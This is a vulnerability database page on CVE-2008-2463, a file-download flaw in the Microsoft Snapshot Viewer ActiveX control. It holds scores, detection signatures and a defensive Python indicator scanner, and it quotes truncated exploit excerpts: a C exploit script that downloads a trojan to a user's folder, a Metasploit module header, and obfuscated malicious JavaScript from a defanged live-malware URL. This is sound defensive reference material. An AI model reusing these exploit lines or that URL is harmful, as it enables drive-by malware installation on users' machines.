CVE-2008-2463
Published 2008-07-07
Priority P267 · medium · CVSS 2.0 6.8
CVSS vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Badges: ITW · Exploit · VulnCheck KEV (exploited in the wild)
EPSS: 59.13% (99.0th percentile)
The Microsoft Office Snapshot Viewer ActiveX control in snapview.ocx 10.0.5529.0, as distributed in the standalone Snapshot Viewer and Microsoft Office Access 2000 through 2003, allows remote attackers to download arbitrary files to a client machine via a crafted HTML document or e-mail message, probably involving use of the SnapshotPath and CompressedPath properties and the PrintSnapshot method. NOTE: this can be leveraged for code execution by writing to a Startup folder.
Affected (3 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | office_snapshot_viewer_activex | — | — |
| microsoft | office_snapshot_viewer_activex | — | — |
| microsoft | office_snapshot_viewer_activex | — | — |
Detection & IOCs (extracted from sources)
- Snort SID 13903-13910
- Snort SID 15362
Detection signals:
- Detect ActiveX instantiation of the Snapshot Viewer Control by looking for the ProgID 'snpvw.Snapshot Viewer Control.1' in HTML/script content delivered over HTTP.
- Detect JavaScript obfuscation via excessive String.fromCharCode() density: more than ~5 calls within a 500-byte window is a strong indicator of malicious obfuscation used to hide this exploit.
- Detect the eval(unescape('...')) obfuscation pattern where the unescape payload is large; this is a known technique used to deliver this and related ActiveX exploits.
- Monitor for files written to Startup folder paths (e.g., All Users\Start Menu\Programs\Startup) by browser or ActiveX processes, as the exploit leverages this for code execution persistence.
- Exploit delivery uses chained HTTP 302 redirects and nested 1x1 pixel iframes across multiple levels before serving the final ActiveX exploit page; multi-hop redirect chains to small iframes are a detection signal.
Caveats:
- Snort SIDs 13903-13910 cover direct (non-obfuscated) CVE-2008-2463 exploit traffic but will NOT fire on heavily obfuscated JavaScript delivery of the same exploit.
- SID 15362 (String.fromCharCode density detection) may generate false positives against legitimate sites that obfuscate JavaScript; analyst triage or per-site whitelisting is recommended.
- The eval(unescape()) detection rule may also generate occasional false positives and should be tuned accordingly.
- The Metasploit module randomizes the ActiveX object variable name and the dropped executable filename, so static string signatures on those values will not be reliable.
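The content-based signals in the list above (the ProgID string, String.fromCharCode() density per 500-byte window, large eval(unescape()) payloads, and 1x1 iframes) can be checked with a small scanner run over delivered HTML/script. The Python below is an added example written for this page; it is not one of the Snort rules referenced above nor code from any cited source. The ~5-calls-per-500-bytes figure comes from the list; the 256-byte eval(unescape()) payload minimum, the `example.invalid` host and both sample documents are constructed assumptions. The host-side signal (writes to Startup folder paths) is out of scope for a content scanner and is not covered here.

```python
"""Content-based checks for the CVE-2008-2463 delivery indicators listed above.

Added example for this page. Thresholds other than the ~5 calls per 500 bytes
named in the detection list, and every sample document, are constructed assumptions.
"""
import re

# ProgID named in the detection list above.
SNAPSHOT_VIEWER_PROGID = "snpvw.Snapshot Viewer Control.1"

# Thresholds: the density figures come from the list above; the payload minimum
# is an assumed value chosen for this example.
FROMCHARCODE_WINDOW_BYTES = 500
FROMCHARCODE_MAX_CALLS = 5
EVAL_UNESCAPE_MIN_PAYLOAD = 256

FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\s*\(", re.IGNORECASE)
EVAL_UNESCAPE_RE = re.compile(
    r"eval\s*\(\s*unescape\s*\(\s*(['\"])(.*?)\1\s*\)\s*\)", re.IGNORECASE | re.DOTALL
)
TINY_IFRAME_RE = re.compile(
    r"<iframe\b[^>]*\b(?:width|height)\s*=\s*['\"]?1\b[^>]*>", re.IGNORECASE
)


def _as_text(content: bytes) -> str:
    # latin-1 keeps one character per byte, so character offsets equal byte offsets.
    return content.decode("latin-1")


def progid_present(content: bytes) -> bool:
    """True if the Snapshot Viewer ProgID appears anywhere in the document."""
    return SNAPSHOT_VIEWER_PROGID.lower() in _as_text(content).lower()


def max_fromcharcode_density(content: bytes, window: int = FROMCHARCODE_WINDOW_BYTES) -> int:
    """Largest number of String.fromCharCode( calls that start inside any `window`-byte span.

    Sliding window over the sorted call offsets, linear in the number of calls.
    """
    offsets = [m.start() for m in FROMCHARCODE_RE.finditer(_as_text(content))]
    best, lo = 0, 0
    for hi, off in enumerate(offsets):
        while off - offsets[lo] >= window:
            lo += 1
        best = max(best, hi - lo + 1)
    return best


def largest_eval_unescape_payload(content: bytes) -> int:
    """Byte length of the largest string literal inside eval(unescape('...')), or 0 if none."""
    return max((len(m.group(2)) for m in EVAL_UNESCAPE_RE.finditer(_as_text(content))), default=0)


def tiny_iframe_count(content: bytes) -> int:
    """Number of <iframe> tags declaring a 1-pixel width or height."""
    return len(TINY_IFRAME_RE.findall(_as_text(content)))


def analyse(content: bytes) -> dict:
    """Run every check and collect readable reasons; 'suspicious' is True if any check fires."""
    progid = progid_present(content)
    density = max_fromcharcode_density(content)
    payload = largest_eval_unescape_payload(content)
    iframes = tiny_iframe_count(content)
    reasons = []
    if progid:
        reasons.append("Snapshot Viewer ProgID instantiation")
    if density > FROMCHARCODE_MAX_CALLS:
        reasons.append(f"{density} String.fromCharCode() calls within {FROMCHARCODE_WINDOW_BYTES} bytes")
    if payload >= EVAL_UNESCAPE_MIN_PAYLOAD:
        reasons.append(f"eval(unescape()) with {payload}-byte payload")
    if iframes:
        reasons.append(f"{iframes} 1-pixel iframe(s)")
    return {
        "progid": progid,
        "fromcharcode_density": density,
        "eval_unescape_payload": payload,
        "tiny_iframes": iframes,
        "reasons": reasons,
        "suspicious": bool(reasons),
    }


# Constructed sample documents (not real captures): an ordinary page, and a page
# that carries the indicators while doing nothing harmful.
BENIGN_PAGE = (
    b"<html><body><script>\n"
    b"var greeting = 'hello'; document.write(greeting);\n"
    b"</script></body></html>\n"
)

INDICATOR_PAGE = (
    b"<html><body>\n"
    b"<iframe src='http://example.invalid/next' width=1 height=1></iframe>\n"
    b"<script>\n"
    b"var o = new ActiveXObject('snpvw.Snapshot Viewer Control.1');\n"
    b"document.write(" + b"+".join(b"String.fromCharCode(%d)" % c for c in b"hello world") + b");\n"
    b"eval(unescape('" + b"%20" * 200 + b"'));\n"
    b"</script></body></html>\n"
)

if __name__ == "__main__":
    for name, page in (("benign", BENIGN_PAGE), ("indicators", INDICATOR_PAGE)):
        result = analyse(page)
        print(f"{name}: suspicious={result['suspicious']} reasons={result['reasons']}")
```

The iframe check is deliberately naive: it would not see an `<iframe` assembled from concatenated fragments like the Talos sample further down, which is exactly why the density and eval(unescape()) heuristics exist alongside literal-string matching. Per-site whitelisting, as the caveats above suggest, belongs in the caller rather than in these functions.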
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 6.8 | MEDIUM | AV:N/AC:M/Au:N/C:P/I:P/A:P |
| vulncheck | — | 6.8 | MEDIUM | — |
GHSA
GHSA-frx4-jc3x-7q59 (ghsa_unreviewed, 2022-05-01): CVE-2008-2463 [MEDIUM], CWE-94
Description: same as the CVE summary above.
VulnCheck
CVE-2008-2463 [MEDIUM] Microsoft Office Improper Control of Generation of Code ('Code Injection') (vulncheck, 2008, CVSS 6.8)
Description: same as the CVE summary above.
Affected: Microsoft Office
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://learn.microsoft.com/en-us/
No detection rules found.
Exploit-DB
Snapshot Viewer for Microsoft Access - ActiveX Control Arbitrary File Download (Metasploit) (exploitdb, 2010-09-20, CVE-2008-2463)
---
```ruby
##
# $Id: ms08_041_snapshotviewer.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'

# Class header and the start of initialize restored where HTML extraction
# swallowed the "< Msf::Exploit::Remote" superclass and the 'Name' key.
class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download',
      'Description' => %q{
          This module allows remote attackers to place arbitrary files on a users file system
          via the Microsoft Office Snapshot Viewer ActiveX Control.
      },
      'License'     => MSF_LICENSE,
      'Author'      => [ 'MC' ],
      'Version'     => '$Revision: 10394 $',
      'R
```
Exploit-DB
Microsoft Access - 'Snapview.ocx 10.0.5529.0' ActiveX Remote File Download (exploitdb, 2008-07-24, CVE-2008-2463)
---
```c
/* Microsoft Access Snapshot Viewer ActiveX Control Exploit
   Ms-Access SnapShot Exploit Snapview.ocx v 10.0.5529.0
   Download nice binaries into an arbitrary box
   Vulnerability discovered by Oliver Lavery
   https://www.securityfocus.com/bid/8536/info
   Remote: Yes
   greetz to str0ke */
/* header names restored; HTML extraction stripped the angle-bracketed file names */
#include <stdio.h>
#include <stdlib.h>
#define Filename "Ms-Access-SnapShot.html"
FILE *File;
/* the HTML/object markup inside this string was stripped by extraction and is not reconstructed here */
char data[] = "\n\n"
"\nvar arbitrary_file = 'http://path_to_trojan'\n"
"var dest = 'C:/Docume~1/ALLUSE~1/trojan.exe'\nattack.SnapshotPath = arbitrary_file\n"
"attack.CompressedPath = destination\nattack.PrintSnapshot(arbitrary_file,destination)\n"
"\n";
int main ()
{
printf("**Microsoft Access Snapshot Viewer ActiveX Exploit**\n");
printf("**c0ded by callAX**\
```
Metasploit
Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download (metasploit)
This module allows remote attackers to place arbitrary files on a user's file system via the Microsoft Office Snapshot Viewer ActiveX Control.
Talos
Detecting Silly Javascript Obfuscation Techniques (blogs_talos, 2009-02-24)
## Detecting Silly Javascript Obfuscation Techniques
Last week I got an e-mail from Edward Fjellskål, Senior Security Analyst at Sourcefire's new Norwegian partner Redpill Linpro. He'd run across a strange piece of obfuscated Javascript at hxxp://bizoplata.ru/pay.html (WARNING: CONTAINS LIVE MALWARE), and he wanted to know if I could figure out what exactly it was doing and whether it was indeed malicious.
A quick wget of that URL gave me Javascript that was clearly trying to hide something:
```javascript
document.write(''+'<ifr'+'am'+'e '+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(61)+''+'"7'+'4f'+String.fromCharCode(52)+''+unescape('%32')+'5'+'c'+unescape('%30')+unescape('%65%65%39')+unescape('%32%62')+String.fromCharCode(52)+String.fromCharCode(56)+''+'992a'+unescape('%65%33%62')+String.fromCharCode(49)+String.from
```
References
- http://marc.info/?l=bugtraq&m=121915960406986&w=2
- http://secunia.com/advisories/30883
- http://www.exploit-db.com/exploits/6124
- http://www.kb.cert.org/vuls/id/837785
- http://www.microsoft.com/technet/security/advisory/955179.mspx
- http://www.securityfocus.com/bid/30114
- http://www.securitytracker.com/id?1020433
- http://www.us-cert.gov/cas/techalerts/TA08-189A.html
- http://www.us-cert.gov/cas/techalerts/TA08-225A.html
- http://www.vupen.com/english/advisories/2008/2012/references
- https://exchange.xforce.ibmcloud.com/vulnerabilities/43613
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6120